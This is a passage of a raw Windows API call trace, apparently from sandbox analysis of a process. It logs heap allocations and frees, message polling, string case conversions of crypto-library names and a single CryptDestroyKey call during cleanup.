(HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0206.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0206.045] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0206.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0206.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0206.045] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0206.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0206.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0206.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0206.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0206.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0206.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0206.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0206.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0206.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0206.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0206.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0206.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0206.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0206.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0206.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0206.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0206.207] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0206.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0206.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0206.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0206.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0206.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0206.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0206.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0206.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0206.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0206.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0206.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0206.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0206.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0206.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50998, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0206.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0206.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0206.209] CryptDestroyKey (hKey=0xa87310) returned 1 [0206.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0206.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0206.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0206.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0206.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0206.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0206.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0206.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0206.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0206.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0206.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0206.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0206.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0206.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0206.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0206.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0206.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0206.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0206.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0206.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0206.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0206.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0206.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0206.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0206.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0206.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0206.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0206.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0206.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0206.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0206.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0206.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0206.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0206.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0206.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0206.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0206.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0206.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0206.211] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0206.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0206.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0206.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0206.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0206.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0206.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0206.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0206.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0206.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0206.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0206.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0206.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0206.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0206.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0206.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0206.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0206.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0206.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0206.211] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0206.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0206.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0206.212] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0206.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0206.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0206.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0206.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0206.212] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0206.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0206.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0206.212] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0206.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0206.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0206.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0206.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0206.212] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0206.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0206.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0206.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0206.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0206.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0206.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0206.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0206.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0206.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0206.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0206.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0206.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0206.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0206.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0206.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0206.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0206.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0206.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0206.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0206.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0206.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0206.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0206.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0206.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0206.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0206.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0206.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0206.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0206.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0206.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0206.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0206.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0206.214] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0206.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0206.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0206.214] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0206.214] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0206.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0206.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0206.214] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0206.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0206.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0206.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0206.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0206.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0206.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0206.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0206.214] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0206.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0206.215] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0206.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0206.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0206.215] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0206.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0206.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0206.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0206.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0206.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0206.215] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0206.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0206.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0206.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0206.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0206.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0206.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0206.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0206.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0206.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0206.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0206.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0206.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0206.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0206.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0206.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0206.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0206.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0206.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0206.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0206.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0206.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0206.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0206.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0206.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0206.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0206.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0206.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0206.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0206.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0206.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0206.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0206.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0206.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0206.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0206.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0206.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0206.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0206.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0206.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0206.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0206.217] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.217] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0206.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0206.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0206.217] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.217] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0206.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0206.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0206.217] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0206.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0206.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0206.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0206.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0206.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0206.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0206.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0206.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0206.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0206.218] HeapFree (in: hHeap=0x970000, 